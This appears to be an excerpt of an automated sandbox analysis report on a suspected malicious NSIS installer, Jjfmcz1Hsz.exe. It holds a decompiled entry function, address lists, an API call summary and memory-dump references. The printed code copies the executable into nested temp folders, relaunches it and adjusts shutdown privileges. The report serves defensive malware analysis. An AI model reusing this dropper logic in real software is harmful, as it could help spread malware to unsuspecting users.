4033a7-4033bd call 405cf9 * 2 76->88 89 403413-403419 lstrcatA 77->89 90 40341e-403438 lstrcatA lstrcmpiA 77->90 91 403574-40357e ExitWindowsEx 78->91 92 403568-403572 78->92 79->78 80->72 81 403387-40338a 80->81 81->72 81->80 88->57 89->90 90->53 94 40343a-40343d 90->94 91->69 95 403580-403582 call 40140b 91->95 92->91 92->95 97 403446 call 405455 94->97 98 40343f-403444 call 4053d8 94->98 95->69 106 40344b-403458 SetCurrentDirectoryA 97->106 98->106 107 403465-40348d call 405cf9 106->107 108 40345a-403460 call 405cf9 106->108 112 403493-4034af call 405d1b DeleteFileA 107->112 108->107 115 4034f0-4034f7 112->115 116 4034b1-4034c1 CopyFileA 112->116 115->112 117 4034f9-403500 call 405bb4 115->117 116->115 118 4034c3-4034e3 call 405bb4 call 405d1b call 40548a 116->118 117->53 118->115 127 4034e5-4034ec CloseHandle 118->127 127->115
                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                            			_entry_() {
                                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                            				char* _t52;
                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                            				void* _t58;
                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                            				int _t62;
                                                                                                                                                                            				int _t65;
                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                            				int _t67;
                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                            				void* _t93;
                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                            				void* _t112;
                                                                                                                                                                            				void* _t117;
                                                                                                                                                                            				intOrPtr* _t118;
                                                                                                                                                                            				char _t121;
                                                                                                                                                                            				signed int _t140;
                                                                                                                                                                            				signed int _t141;
                                                                                                                                                                            				int _t149;
                                                                                                                                                                            				void* _t150;
                                                                                                                                                                            				intOrPtr* _t152;
                                                                                                                                                                            				CHAR* _t155;
                                                                                                                                                                            				CHAR* _t156;
                                                                                                                                                                            				void* _t158;
                                                                                                                                                                            				char* _t159;
                                                                                                                                                                            				void* _t162;
                                                                                                                                                                            				void* _t163;
                                                                                                                                                                            				char _t185;
                                                                                                                                                                            
                                                                                                                                                                            				 *(_t163 + 0x18) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                                                            				 *(_t163 + 0x20) = 0;
                                                                                                                                                                            				 *(_t163 + 0x14) = 0x20;
                                                                                                                                                                            				SetErrorMode(0x8001); // executed
                                                                                                                                                                            				if(GetVersion() != 6) {
                                                                                                                                                                            					_t118 = E00406092(0);
                                                                                                                                                                            					if(_t118 != 0) {
                                                                                                                                                                            						 *_t118(0xc00);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_t155 = "UXTHEME";
                                                                                                                                                                            				do {
                                                                                                                                                                            					E00406024(_t155); // executed
                                                                                                                                                                            					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
                                                                                                                                                                            				} while ( *_t155 != 0);
                                                                                                                                                                            				E00406092(9);
                                                                                                                                                                            				_t45 = E00406092(7);
                                                                                                                                                                            				 *0x423704 = _t45;
                                                                                                                                                                            				__imp__#17(_t158);
                                                                                                                                                                            				__imp__OleInitialize(0); // executed
                                                                                                                                                                            				 *0x4237b8 = _t45;
                                                                                                                                                                            				SHGetFileInfoA(0x41ecc8, 0, _t163 + 0x38, 0x160, 0); // executed
                                                                                                                                                                            				E00405CF9(0x422f00, "NSIS Error");
                                                                                                                                                                            				_t49 = GetCommandLineA();
                                                                                                                                                                            				_t159 = "\"C:\\Users\\Arthur\\Desktop\\Jjfmcz1Hsz.exe\"";
                                                                                                                                                                            				E00405CF9(_t159, _t49);
                                                                                                                                                                            				 *0x423700 = GetModuleHandleA(0);
                                                                                                                                                                            				_t52 = _t159;
                                                                                                                                                                            				if("\"C:\\Users\\Arthur\\Desktop\\Jjfmcz1Hsz.exe\"" == 0x22) {
                                                                                                                                                                            					 *(_t163 + 0x14) = 0x22;
                                                                                                                                                                            					_t52 =  &M00429001;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t54 = CharNextA(E00405796(_t52,  *(_t163 + 0x14)));
                                                                                                                                                                            				 *(_t163 + 0x1c) = _t54;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t121 =  *_t54;
                                                                                                                                                                            					_t168 = _t121;
                                                                                                                                                                            					if(_t121 == 0) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t121 - 0x20;
                                                                                                                                                                            					if(_t121 != 0x20) {
                                                                                                                                                                            						L10:
                                                                                                                                                                            						__eflags =  *_t54 - 0x22;
                                                                                                                                                                            						 *(_t163 + 0x14) = 0x20;
                                                                                                                                                                            						if( *_t54 == 0x22) {
                                                                                                                                                                            							_t54 =  &(_t54[1]);
                                                                                                                                                                            							__eflags = _t54;
                                                                                                                                                                            							 *(_t163 + 0x14) = 0x22;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *_t54 - 0x2f;
                                                                                                                                                                            						if( *_t54 != 0x2f) {
                                                                                                                                                                            							L22:
                                                                                                                                                                            							_t54 = E00405796(_t54,  *(_t163 + 0x14));
                                                                                                                                                                            							__eflags =  *_t54 - 0x22;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								_t54 =  &(_t54[1]);
                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                            							}
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t54 =  &(_t54[1]);
                                                                                                                                                                            							__eflags =  *_t54 - 0x53;
                                                                                                                                                                            							if( *_t54 != 0x53) {
                                                                                                                                                                            								L17:
                                                                                                                                                                            								__eflags =  *_t54 - ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC");
                                                                                                                                                                            								if( *_t54 != ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC")) {
                                                                                                                                                                            									L21:
                                                                                                                                                                            									__eflags =  *((intOrPtr*)(_t54 - 2)) - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=");
                                                                                                                                                                            									if( *((intOrPtr*)(_t54 - 2)) == ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=")) {
                                                                                                                                                                            										 *((char*)(_t54 - 2)) = 0;
                                                                                                                                                                            										__eflags =  &(_t54[2]);
                                                                                                                                                                            										E00405CF9("C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical",  &(_t54[2]));
                                                                                                                                                                            										L27:
                                                                                                                                                                            										_t156 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                                                                                                            										GetTempPathA(0x400, _t156); // executed
                                                                                                                                                                            										_t58 = E004030A8(_t168);
                                                                                                                                                                            										_t169 = _t58;
                                                                                                                                                                            										if(_t58 != 0) {
                                                                                                                                                                            											L30:
                                                                                                                                                                            											DeleteFileA("1033"); // executed
                                                                                                                                                                            											_t60 = E00402C66(_t171,  *(_t163 + 0x20)); // executed
                                                                                                                                                                            											 *((intOrPtr*)(_t163 + 0x10)) = _t60;
                                                                                                                                                                            											if(_t60 != 0) {
                                                                                                                                                                            												L40:
                                                                                                                                                                            												E0040359F();
                                                                                                                                                                            												__imp__OleUninitialize();
                                                                                                                                                                            												_t181 =  *((intOrPtr*)(_t163 + 0x10));
                                                                                                                                                                            												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
                                                                                                                                                                            													__eflags =  *0x423794;
                                                                                                                                                                            													if( *0x423794 == 0) {
                                                                                                                                                                            														L64:
                                                                                                                                                                            														_t62 =  *0x4237ac;
                                                                                                                                                                            														__eflags = _t62 - 0xffffffff;
                                                                                                                                                                            														if(_t62 != 0xffffffff) {
                                                                                                                                                                            															 *(_t163 + 0x14) = _t62;
                                                                                                                                                                            														}
                                                                                                                                                                            														ExitProcess( *(_t163 + 0x14));
                                                                                                                                                                            													}
                                                                                                                                                                            													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
                                                                                                                                                                            													__eflags = _t65;
                                                                                                                                                                            													_t149 = 2;
                                                                                                                                                                            													if(_t65 != 0) {
                                                                                                                                                                            														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
                                                                                                                                                                            														 *(_t163 + 0x38) = 1;
                                                                                                                                                                            														 *(_t163 + 0x44) = _t149;
                                                                                                                                                                            														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
                                                                                                                                                                            													}
                                                                                                                                                                            													_t66 = E00406092(4);
                                                                                                                                                                            													__eflags = _t66;
                                                                                                                                                                            													if(_t66 == 0) {
                                                                                                                                                                            														L62:
                                                                                                                                                                            														_t67 = ExitWindowsEx(_t149, 0x80040002);
                                                                                                                                                                            														__eflags = _t67;
                                                                                                                                                                            														if(_t67 != 0) {
                                                                                                                                                                            															goto L64;
                                                                                                                                                                            														}
                                                                                                                                                                            														goto L63;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
                                                                                                                                                                            														__eflags = _t69;
                                                                                                                                                                            														if(_t69 == 0) {
                                                                                                                                                                            															L63:
                                                                                                                                                                            															E0040140B(9);
                                                                                                                                                                            															goto L64;
                                                                                                                                                                            														}
                                                                                                                                                                            														goto L62;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												E004054EF( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
                                                                                                                                                                            												ExitProcess(2);
                                                                                                                                                                            											}
                                                                                                                                                                            											if( *0x42371c == 0) {
                                                                                                                                                                            												L39:
                                                                                                                                                                            												 *0x4237ac =  *0x4237ac | 0xffffffff;
                                                                                                                                                                            												 *(_t163 + 0x18) = E00403679( *0x4237ac);
                                                                                                                                                                            												goto L40;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t152 = E00405796(_t159, 0);
                                                                                                                                                                            											if(_t152 < _t159) {
                                                                                                                                                                            												L36:
                                                                                                                                                                            												_t178 = _t152 - _t159;
                                                                                                                                                                            												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
                                                                                                                                                                            												if(_t152 < _t159) {
                                                                                                                                                                            													_t150 = E00405472(_t181);
                                                                                                                                                                            													lstrcatA(_t156, "~nsu");
                                                                                                                                                                            													if(_t150 != 0) {
                                                                                                                                                                            														lstrcatA(_t156, "A");
                                                                                                                                                                            													}
                                                                                                                                                                            													lstrcatA(_t156, ".tmp");
                                                                                                                                                                            													_t161 = "C:\\Users\\Arthur\\Desktop";
                                                                                                                                                                            													if(lstrcmpiA(_t156, "C:\\Users\\Arthur\\Desktop") != 0) {
                                                                                                                                                                            														_push(_t156);
                                                                                                                                                                            														if(_t150 == 0) {
                                                                                                                                                                            															E00405455();
                                                                                                                                                                            														} else {
                                                                                                                                                                            															E004053D8();
                                                                                                                                                                            														}
                                                                                                                                                                            														SetCurrentDirectoryA(_t156);
                                                                                                                                                                            														_t185 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical"; // 0x43
                                                                                                                                                                            														if(_t185 == 0) {
                                                                                                                                                                            															E00405CF9("C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical", _t161);
                                                                                                                                                                            														}
                                                                                                                                                                            														E00405CF9(0x424000,  *(_t163 + 0x1c));
                                                                                                                                                                            														_t136 = "A";
                                                                                                                                                                            														_t162 = 0x1a;
                                                                                                                                                                            														 *0x424400 = "A";
                                                                                                                                                                            														do {
                                                                                                                                                                            															E00405D1B(0, 0x41e8c8, _t156, 0x41e8c8,  *((intOrPtr*)( *0x423710 + 0x120)));
                                                                                                                                                                            															DeleteFileA(0x41e8c8);
                                                                                                                                                                            															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\Arthur\\Desktop\\Jjfmcz1Hsz.exe", 0x41e8c8, 1) != 0) {
                                                                                                                                                                            																E00405BB4(_t136, 0x41e8c8, 0);
                                                                                                                                                                            																E00405D1B(0, 0x41e8c8, _t156, 0x41e8c8,  *((intOrPtr*)( *0x423710 + 0x124)));
                                                                                                                                                                            																_t93 = E0040548A(0x41e8c8);
                                                                                                                                                                            																if(_t93 != 0) {
                                                                                                                                                                            																	CloseHandle(_t93);
                                                                                                                                                                            																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
                                                                                                                                                                            																}
                                                                                                                                                                            															}
                                                                                                                                                                            															 *0x424400 =  *0x424400 + 1;
                                                                                                                                                                            															_t162 = _t162 - 1;
                                                                                                                                                                            														} while (_t162 != 0);
                                                                                                                                                                            														E00405BB4(_t136, _t156, 0);
                                                                                                                                                                            													}
                                                                                                                                                                            													goto L40;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *_t152 = 0;
                                                                                                                                                                            												_t153 = _t152 + 4;
                                                                                                                                                                            												if(E00405859(_t178, _t152 + 4) == 0) {
                                                                                                                                                                            													goto L40;
                                                                                                                                                                            												}
                                                                                                                                                                            												E00405CF9("C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical", _t153);
                                                                                                                                                                            												E00405CF9("C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical\\Micala\\aarhundredeskiftet\\Dichroitic30\\Climaxed", _t153);
                                                                                                                                                                            												 *((intOrPtr*)(_t163 + 0x10)) = 0;
                                                                                                                                                                            												goto L39;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t109 = (( *0x40915b << 0x00000008 |  *0x40915a) << 0x00000008 |  *0x409159) << 0x00000008 | " _?=";
                                                                                                                                                                            											while( *_t152 != _t109) {
                                                                                                                                                                            												_t152 = _t152 - 1;
                                                                                                                                                                            												if(_t152 >= _t159) {
                                                                                                                                                                            													continue;
                                                                                                                                                                            												}
                                                                                                                                                                            												goto L36;
                                                                                                                                                                            											}
                                                                                                                                                                            											goto L36;
                                                                                                                                                                            										}
                                                                                                                                                                            										GetWindowsDirectoryA(_t156, 0x3fb);
                                                                                                                                                                            										lstrcatA(_t156, "\\Temp");
                                                                                                                                                                            										_t112 = E004030A8(_t169);
                                                                                                                                                                            										_t170 = _t112;
                                                                                                                                                                            										if(_t112 != 0) {
                                                                                                                                                                            											goto L30;
                                                                                                                                                                            										}
                                                                                                                                                                            										GetTempPathA(0x3fc, _t156);
                                                                                                                                                                            										lstrcatA(_t156, "Low");
                                                                                                                                                                            										SetEnvironmentVariableA("TEMP", _t156);
                                                                                                                                                                            										SetEnvironmentVariableA("TMP", _t156);
                                                                                                                                                                            										_t117 = E004030A8(_t170);
                                                                                                                                                                            										_t171 = _t117;
                                                                                                                                                                            										if(_t117 == 0) {
                                                                                                                                                                            											goto L40;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L30;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L22;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t140 = _t54[4];
                                                                                                                                                                            								__eflags = _t140 - 0x20;
                                                                                                                                                                            								if(_t140 == 0x20) {
                                                                                                                                                                            									L20:
                                                                                                                                                                            									_t15 = _t163 + 0x20;
                                                                                                                                                                            									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
                                                                                                                                                                            									__eflags =  *_t15;
                                                                                                                                                                            									goto L21;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _t140;
                                                                                                                                                                            								if(_t140 != 0) {
                                                                                                                                                                            									goto L21;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L20;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t141 = _t54[1];
                                                                                                                                                                            							__eflags = _t141 - 0x20;
                                                                                                                                                                            							if(_t141 == 0x20) {
                                                                                                                                                                            								L16:
                                                                                                                                                                            								 *0x4237a0 = 1;
                                                                                                                                                                            								goto L17;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t141;
                                                                                                                                                                            							if(_t141 != 0) {
                                                                                                                                                                            								goto L17;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L16;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						goto L9;
                                                                                                                                                                            					}
                                                                                                                                                                            					do {
                                                                                                                                                                            						L9:
                                                                                                                                                                            						_t54 =  &(_t54[1]);
                                                                                                                                                                            						__eflags =  *_t54 - 0x20;
                                                                                                                                                                            					} while ( *_t54 == 0x20);
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L27;
                                                                                                                                                                            			}
































                                                                                                                                                                            0x004030e9
                                                                                                                                                                            0x004030ed
                                                                                                                                                                            0x004030f5
                                                                                                                                                                            0x004030f9
                                                                                                                                                                            0x004030fe
                                                                                                                                                                            0x0040310e
                                                                                                                                                                            0x00403111
                                                                                                                                                                            0x00403118
                                                                                                                                                                            0x0040311f
                                                                                                                                                                            0x0040311f
                                                                                                                                                                            0x00403118
                                                                                                                                                                            0x00403121
                                                                                                                                                                            0x00403126
                                                                                                                                                                            0x00403127
                                                                                                                                                                            0x00403133
                                                                                                                                                                            0x00403137
                                                                                                                                                                            0x0040313e
                                                                                                                                                                            0x00403145
                                                                                                                                                                            0x0040314a
                                                                                                                                                                            0x0040314f
                                                                                                                                                                            0x00403156
                                                                                                                                                                            0x0040315c
                                                                                                                                                                            0x00403172
                                                                                                                                                                            0x00403182
                                                                                                                                                                            0x00403187
                                                                                                                                                                            0x0040318d
                                                                                                                                                                            0x00403194
                                                                                                                                                                            0x004031a7
                                                                                                                                                                            0x004031ac
                                                                                                                                                                            0x004031ae
                                                                                                                                                                            0x004031b0
                                                                                                                                                                            0x004031b5
                                                                                                                                                                            0x004031b5
                                                                                                                                                                            0x004031c5
                                                                                                                                                                            0x004031cb
                                                                                                                                                                            0x00403294
                                                                                                                                                                            0x00403294
                                                                                                                                                                            0x00403296
                                                                                                                                                                            0x00403298
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004031d4
                                                                                                                                                                            0x004031d7
                                                                                                                                                                            0x004031df
                                                                                                                                                                            0x004031df
                                                                                                                                                                            0x004031e2
                                                                                                                                                                            0x004031e7
                                                                                                                                                                            0x004031e9
                                                                                                                                                                            0x004031e9
                                                                                                                                                                            0x004031ea
                                                                                                                                                                            0x004031ea
                                                                                                                                                                            0x004031ef
                                                                                                                                                                            0x004031f2
                                                                                                                                                                            0x00403284
                                                                                                                                                                            0x00403289
                                                                                                                                                                            0x0040328e
                                                                                                                                                                            0x00403291
                                                                                                                                                                            0x00403293
                                                                                                                                                                            0x00403293
                                                                                                                                                                            0x00403293
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004031f8
                                                                                                                                                                            0x004031f8
                                                                                                                                                                            0x004031f9
                                                                                                                                                                            0x004031fc
                                                                                                                                                                            0x00403214
                                                                                                                                                                            0x0040323f
                                                                                                                                                                            0x00403241
                                                                                                                                                                            0x00403254
                                                                                                                                                                            0x0040327f
                                                                                                                                                                            0x00403282
                                                                                                                                                                            0x004032a0
                                                                                                                                                                            0x004032a3
                                                                                                                                                                            0x004032ac
                                                                                                                                                                            0x004032b1
                                                                                                                                                                            0x004032b7
                                                                                                                                                                            0x004032c2
                                                                                                                                                                            0x004032c4
                                                                                                                                                                            0x004032c9
                                                                                                                                                                            0x004032cb
                                                                                                                                                                            0x00403323
                                                                                                                                                                            0x00403328
                                                                                                                                                                            0x00403332
                                                                                                                                                                            0x00403339
                                                                                                                                                                            0x0040333d
                                                                                                                                                                            0x004033d1
                                                                                                                                                                            0x004033d1
                                                                                                                                                                            0x004033d6
                                                                                                                                                                            0x004033dc
                                                                                                                                                                            0x004033e1
                                                                                                                                                                            0x00403505
                                                                                                                                                                            0x0040350b
                                                                                                                                                                            0x00403587
                                                                                                                                                                            0x00403587
                                                                                                                                                                            0x0040358c
                                                                                                                                                                            0x0040358f
                                                                                                                                                                            0x00403591
                                                                                                                                                                            0x00403591
                                                                                                                                                                            0x00403599
                                                                                                                                                                            0x00403599
                                                                                                                                                                            0x0040351b
                                                                                                                                                                            0x00403523
                                                                                                                                                                            0x00403525
                                                                                                                                                                            0x00403526
                                                                                                                                                                            0x00403533
                                                                                                                                                                            0x00403546
                                                                                                                                                                            0x0040354e
                                                                                                                                                                            0x00403552
                                                                                                                                                                            0x00403552
                                                                                                                                                                            0x0040355a
                                                                                                                                                                            0x0040355f
                                                                                                                                                                            0x00403566
                                                                                                                                                                            0x00403574
                                                                                                                                                                            0x00403576
                                                                                                                                                                            0x0040357c
                                                                                                                                                                            0x0040357e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403568
                                                                                                                                                                            0x0040356e
                                                                                                                                                                            0x00403570
                                                                                                                                                                            0x00403572
                                                                                                                                                                            0x00403580
                                                                                                                                                                            0x00403582
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403582
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403572
                                                                                                                                                                            0x00403566
                                                                                                                                                                            0x004033f0
                                                                                                                                                                            0x004033f7
                                                                                                                                                                            0x004033f7
                                                                                                                                                                            0x00403349
                                                                                                                                                                            0x004033c1
                                                                                                                                                                            0x004033c1
                                                                                                                                                                            0x004033cd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004033cd
                                                                                                                                                                            0x00403352
                                                                                                                                                                            0x00403356
                                                                                                                                                                            0x0040338c
                                                                                                                                                                            0x0040338c
                                                                                                                                                                            0x0040338e
                                                                                                                                                                            0x00403396
                                                                                                                                                                            0x00403408
                                                                                                                                                                            0x0040340a
                                                                                                                                                                            0x00403411
                                                                                                                                                                            0x00403419
                                                                                                                                                                            0x00403419
                                                                                                                                                                            0x00403424
                                                                                                                                                                            0x00403429
                                                                                                                                                                            0x00403438
                                                                                                                                                                            0x0040343c
                                                                                                                                                                            0x0040343d
                                                                                                                                                                            0x00403446
                                                                                                                                                                            0x0040343f
                                                                                                                                                                            0x0040343f
                                                                                                                                                                            0x0040343f
                                                                                                                                                                            0x0040344c
                                                                                                                                                                            0x00403452
                                                                                                                                                                            0x00403458
                                                                                                                                                                            0x00403460
                                                                                                                                                                            0x00403460
                                                                                                                                                                            0x0040346e
                                                                                                                                                                            0x00403473
                                                                                                                                                                            0x00403485
                                                                                                                                                                            0x0040348d
                                                                                                                                                                            0x00403493
                                                                                                                                                                            0x0040349f
                                                                                                                                                                            0x004034a5
                                                                                                                                                                            0x004034af
                                                                                                                                                                            0x004034c5
                                                                                                                                                                            0x004034d6
                                                                                                                                                                            0x004034dc
                                                                                                                                                                            0x004034e3
                                                                                                                                                                            0x004034e6
                                                                                                                                                                            0x004034ec
                                                                                                                                                                            0x004034ec
                                                                                                                                                                            0x004034e3
                                                                                                                                                                            0x004034f0
                                                                                                                                                                            0x004034f6
                                                                                                                                                                            0x004034f6
                                                                                                                                                                            0x004034fb
                                                                                                                                                                            0x004034fb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403438
                                                                                                                                                                            0x00403398
                                                                                                                                                                            0x0040339a
                                                                                                                                                                            0x004033a5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004033ad
                                                                                                                                                                            0x004033b8
                                                                                                                                                                            0x004033bd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004033bd
                                                                                                                                                                            0x00403381
                                                                                                                                                                            0x00403383
                                                                                                                                                                            0x00403387
                                                                                                                                                                            0x0040338a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040338a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403383
                                                                                                                                                                            0x004032d3
                                                                                                                                                                            0x004032df
                                                                                                                                                                            0x004032e4
                                                                                                                                                                            0x004032e9
                                                                                                                                                                            0x004032eb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004032f3
                                                                                                                                                                            0x004032fb
                                                                                                                                                                            0x0040330c
                                                                                                                                                                            0x00403314
                                                                                                                                                                            0x00403316
                                                                                                                                                                            0x0040331b
                                                                                                                                                                            0x0040331d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040331d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403282
                                                                                                                                                                            0x00403243
                                                                                                                                                                            0x00403246
                                                                                                                                                                            0x00403249
                                                                                                                                                                            0x0040324f
                                                                                                                                                                            0x0040324f
                                                                                                                                                                            0x0040324f
                                                                                                                                                                            0x0040324f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040324f
                                                                                                                                                                            0x0040324b
                                                                                                                                                                            0x0040324d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040324d
                                                                                                                                                                            0x004031fe
                                                                                                                                                                            0x00403201
                                                                                                                                                                            0x00403204
                                                                                                                                                                            0x0040320a
                                                                                                                                                                            0x0040320a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040320a
                                                                                                                                                                            0x00403206
                                                                                                                                                                            0x00403208
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403208
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004031d9
                                                                                                                                                                            0x004031d9
                                                                                                                                                                            0x004031d9
                                                                                                                                                                            0x004031da
                                                                                                                                                                            0x004031da
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004031d9
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNELBASE ref: 004030FE
                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00403104
                                                                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040312D
                                                                                                                                                                            • #17.COMCTL32(00000007,00000009), ref: 0040314F
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403156
                                                                                                                                                                            • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000), ref: 00403172
                                                                                                                                                                            • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403187
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Jjfmcz1Hsz.exe",00000000), ref: 0040319A
                                                                                                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Jjfmcz1Hsz.exe",00000020), ref: 004031C5
                                                                                                                                                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032C2
                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032D3
                                                                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032DF
                                                                                                                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032F3
                                                                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032FB
                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040330C
                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403314
                                                                                                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 00403328
                                                                                                                                                                              • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
                                                                                                                                                                              • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                            • OleUninitialize.OLE32(?), ref: 004033D6
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 004033F7
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403514
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040351B
                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403533
                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403552
                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403576
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403599
                                                                                                                                                                              • Part of subcall function 004054EF: MessageBoxIndirectA.USER32(00409218), ref: 0040554A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
